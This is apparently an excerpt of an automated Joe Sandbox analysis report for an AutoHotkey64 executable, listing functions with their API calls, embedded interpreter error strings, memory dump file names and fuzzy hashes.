Instruction Fuzzy Hash: B8414D3160474286FB67AB63A9517ED21A5AF8D7C4F444038BB09472F7EF38C8429A71

Function 0000000140041188 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 358clipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
free.LIBCMT ref: 00000001400411DA
free.LIBCMT ref: 000000014004138B

Strings

Jumps cannot exit a FINALLY block., xrefs: 0000000140046537

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: free$ClipboardCloseCountGlobalTickUnlock
String ID: Jumps cannot exit a FINALLY block.
API String ID: 2149575462-672026804
Opcode ID: 0761aaaa0d3876962cf23437a20583f4c9fdc9fa5bed609d6a9ffe9950e0c371
Instruction ID: 0f2f5d9972bce9d21033c3a579e99a0e0bd631a5ac7134fdfa4306f415c80c7a
Opcode Fuzzy Hash: 0761aaaa0d3876962cf23437a20583f4c9fdc9fa5bed609d6a9ffe9950e0c371
Instruction Fuzzy Hash: 9202AD72604B8486FB668B67E4443E937A1F78CBE4F160126EB4953BF5DB38C891CB05

Function 0000000140029980 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 320
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001400D6F18: _FF_MSGBANNER.LIBCMT ref: 00000001400D6F48
Part of subcall function 00000001400D6F18: HeapAlloc.KERNEL32(?,?,00000000,00000001400DECD8,?,?,00000000,00000001400DC3A5,?,?,?,00000001400DC44F,?,?,00000000,00000001400DB509), ref: 00000001400D6F6D
Part of subcall function 00000001400D6F18: _callnewh.LIBCMT ref: 00000001400D6F86
Part of subcall function 00000001400D6F18: _errno.LIBCMT ref: 00000001400D6F91
Part of subcall function 00000001400D6F18: _errno.LIBCMT ref: 00000001400D6F9C

SetTimer.USER32 ref: 00000001400299F7
free.LIBCMT ref: 0000000140029B9C

Strings

Auto-execute, xrefs: 0000000140029ACA
Memory limit reached (see #MaxMem in the help file)., xrefs: 0000000140029CDF
Out of memory., xrefs: 0000000140029F16

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: _errno$AllocHeapTimer_callnewhfree
String ID: Auto-execute$Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 3943936125-1388267028
Opcode ID: 00562c62d46dd0bd06e4b6db4a2ca870dd6c9d5acf689bfe22b60069126a9de2
Instruction ID: 19d1eb78e92115dcf28899af100625a47d75d6e64b3425a6f7037352afce16fe
Opcode Fuzzy Hash: 00562c62d46dd0bd06e4b6db4a2ca870dd6c9d5acf689bfe22b60069126a9de2
Instruction Fuzzy Hash: 20F16C72200B8486EB52DF26E8503E937A1FB4CFC8F54452AEB4A677B5DB38C891D750

Function 0000000140045B5B Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 253
windowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
_swprintf.LIBCMT ref: 0000000140045C50

Strings

Float, xrefs: 0000000140045B73
%%%s%s%s, xrefs: 0000000140045C49
Integer, xrefs: 0000000140045C60

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_swprintf
String ID: %%%s%s%s$Float$Integer
API String ID: 2710365001-2931010843
Opcode ID: 3aec64e58f415ce4d210949ddd499ed39c5950586a475f8648999252c23d3bbf
Instruction ID: 87c24313d4263fc7ed54f04fb06c15502868c5268720eb1cb3263c0919e1ae51
Opcode Fuzzy Hash: 3aec64e58f415ce4d210949ddd499ed39c5950586a475f8648999252c23d3bbf
Instruction Fuzzy Hash: 5BC1C3B120468486FB668B27E8943E937A1F78DBD4F51012AFB59977F2DB38C880C705

Function 000000014003C140 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 418
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncpy.LIBCMT ref: 000000014003C1C1
realloc.LIBCMT ref: 000000014003C5B2

Strings

Illegal parameter name., xrefs: 000000014003C335
Variable name too long., xrefs: 000000014003C18E
variable, xrefs: 000000014003C223
ErrorLevel, xrefs: 000000014003C29B
The following %s name contains an illegal character:"%-1.300s", xrefs: 000000014003C22A
_$#@, xrefs: 000000014003C1FE
Out of memory., xrefs: 000000014003C567

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: reallocwcsncpy
String ID: ErrorLevel$Illegal parameter name.$Out of memory.$The following %s name contains an illegal character:"%-1.300s"$Variable name too long.$_$#@$variable
API String ID: 3093889600-511781698
Opcode ID: c1ddf76a740a5175c483b0e44cd88fa9557ad93a1c28d70cb6187a83355280da
Instruction ID: 72ccfc93d92cf3ea7b578c48fae96bdda103e218b56047f3bdde7de18f9fe26e
Opcode Fuzzy Hash: c1ddf76a740a5175c483b0e44cd88fa9557ad93a1c28d70cb6187a83355280da
Instruction Fuzzy Hash: 2812B332225B8085EB62CF1AE4407DE73A5F788BD4F540216EB9D93BA9DF38C5A5C740

Function 0000000140040F41 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 247
windowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
free.LIBCMT ref: 0000000140040FED
free.LIBCMT ref: 0000000140040FF9

Strings

Out of memory., xrefs: 000000014004101E

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTickfree$ClipboardCloseGlobalMessagePeekUnlock
String ID: Out of memory.
API String ID: 3568059354-4087320997
Opcode ID: 6f268c309e576aca23eb0c6a05c512506aac561c09216606555951e86c03c892
Instruction ID: 7c42a9870626a85c70a38ff491897bff2d2d94df1a2dd55b5fb7ab06e51fb977
Opcode Fuzzy Hash: 6f268c309e576aca23eb0c6a05c512506aac561c09216606555951e86c03c892
Instruction Fuzzy Hash: 1EC19F72604B4486FB568B27E8843D937A1F78DBD4F11022AEB5963BF6DB38C491CB04

Function 000000014004552C Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 232
windowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140098260: free.LIBCMT ref: 000000014009828D

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetLastError.KERNEL32 ref: 00000001400455D4

Strings

Press OK to continue., xrefs: 0000000140045571
Parameter #1 invalid., xrefs: 00000001400455E8

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseErrorGlobalLastMessagePeekUnlockfree
String ID: Parameter #1 invalid.$Press OK to continue.
API String ID: 2434512724-108709617
Opcode ID: d4de4db09400d738418467aaf110a518499f262806e7ccf629d440cdf737b6ed
Instruction ID: 5a3ea273d959b455f262c2eb030c14cf0c0d32fa329ee82360b7c596d198cd61
Opcode Fuzzy Hash: d4de4db09400d738418467aaf110a518499f262806e7ccf629d440cdf737b6ed
Instruction Fuzzy Hash: 6FB1B0B1604B8486FB628B27E4543E937A1F78DBE4F110226FB5967AF6DB38C481C744

Function 0000000140046213 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 241
windowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Strings

ahk_default, xrefs: 00000001400462E1
%s\%s, xrefs: 000000014004623B

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: %s\%s$ahk_default
API String ID: 1623861271-75935552
Opcode ID: 8db2812ddb07bff7ea4e73ff2864a7df972986d0e2c5f24f3da975eb74581c7d
Instruction ID: f33fe32cf1256195e13aeb7ae52701e7ec82e40441a291807d5102e92cbb84e8
Opcode Fuzzy Hash: 8db2812ddb07bff7ea4e73ff2864a7df972986d0e2c5f24f3da975eb74581c7d
Instruction Fuzzy Hash: 88C1ADB1604A8486FB62CB27E4443E937A1F38CBE4F510126EB5963AF6DB78C485CB45

Function 0000000140043FEC Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 209
windowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Strings

UseErrorLevel, xrefs: 0000000140043FEC
ERROR, xrefs: 0000000140044071

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: ERROR$UseErrorLevel
API String ID: 1623861271-2084857954
Opcode ID: ed29e5d0aba999ecb04fdab5466b45d6bee411a33fe9b454c578c1a2fa064a4e
Instruction ID: 7a09ef86989936cc2dc62eebedb04fab8bf98b221f15f6683ce80842f453cf9b
Opcode Fuzzy Hash: ed29e5d0aba999ecb04fdab5466b45d6bee411a33fe9b454c578c1a2fa064a4e
Instruction Fuzzy Hash: F3B1A3B1604B4486FB66CB27E8847D937A1F78DBE4F11022AEB5963AF5DB38C490C705

Function 000000014004070F Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 296clipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA

Strings

A Goto/Gosub must not jump into a block that doesn't enclose it., xrefs: 0000000140046481

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: ClipboardCloseCountGlobalTickUnlock
String ID: A Goto/Gosub must not jump into a block that doesn't enclose it.
API String ID: 3761015043-1592792148
Opcode ID: 0cd59c029dba41849ab239b16cd9cc43d4da7c221988a46994ba33dcda6063a0
Instruction ID: 8d7a8bce74de7c3d7fdeb41ae3b0d8529f132e4486f1e376afb8c1585ab9e927
Opcode Fuzzy Hash: 0cd59c029dba41849ab239b16cd9cc43d4da7c221988a46994ba33dcda6063a0
Instruction Fuzzy Hash: 88E1DF72604B4086FB668B2BD5443E837A1F78CBE4F164126EB5963BF6DB38C881C745

Function 0000000140040CEF Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 231windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400D6A8C: _errno.LIBCMT ref: 00000001400D6AA4
Part of subcall function 00000001400D6A8C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400D6AAF

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Strings

CSV, xrefs: 0000000140040CEF

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
String ID: CSV
API String ID: 130734711-2651001053
Opcode ID: 7c1f77361c7246e23b79fc58495a168dc522b655a843879a6fcdb76d7d4327b4
Instruction ID: 8ab1d66be799228b0c1528adf326cde04cccd6c106e725e7d85bbd2ebaa49d85
Opcode Fuzzy Hash: 7c1f77361c7246e23b79fc58495a168dc522b655a843879a6fcdb76d7d4327b4
Instruction Fuzzy Hash: 6CC16D72604B4489FB628B67E8843D937A1F38DBE4F110226EB5963BF5DB38C491CB45

Function 0000000140044AEE Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 226windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Strings

Target label does not exist., xrefs: 0000000140044B4C

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: Target label does not exist.
API String ID: 1623861271-2507343300
Opcode ID: dbf0144f3882065228323418766a552558836e9c017e8bcde4a7e27f1ec4e749
Instruction ID: 934fa31a776e0b474852b87323de20fda490f875ac7ba765b3ef459782e828f9
Opcode Fuzzy Hash: dbf0144f3882065228323418766a552558836e9c017e8bcde4a7e27f1ec4e749
Instruction Fuzzy Hash: 2BB191B1204B8486FB628B27E4447E937A1F74DBE4F120226EB5963BF5DB38C495C744

Function 0000000140044210 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 213windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Strings

Parameter #4 invalid., xrefs: 000000014004422E

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: Parameter #4 invalid.
API String ID: 1623861271-2921795276
Opcode ID: eb68a92082e7481186c86d1db7723d1998b5a2dd16885b59a62ecb1a149e9ac1
Instruction ID: b97b049c8c632629edc1120b8351026e1caa8672c38efc1b9f394bd6d35f4d31
Opcode Fuzzy Hash: eb68a92082e7481186c86d1db7723d1998b5a2dd16885b59a62ecb1a149e9ac1
Instruction Fuzzy Hash: 9AB1A2B1204A4486F7628B27E4843D937A1F78DBE4F110126FB5967BF5DB38C491C744

Function 0000000140045970 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 207windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400D6A8C: _errno.LIBCMT ref: 00000001400D6AA4
Part of subcall function 00000001400D6A8C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400D6AAF

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Strings

Play, xrefs: 0000000140045970

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
String ID: Play
API String ID: 130734711-4273697156
Opcode ID: e5842c8c87d392d3343c29d665c8d5d911e55b0ba21e752e6f8c008d9aba4a35
Instruction ID: a1bfc9c7a0fc8cc031d19e21ab7bcb2061f898f91024154540ddc133227642e1
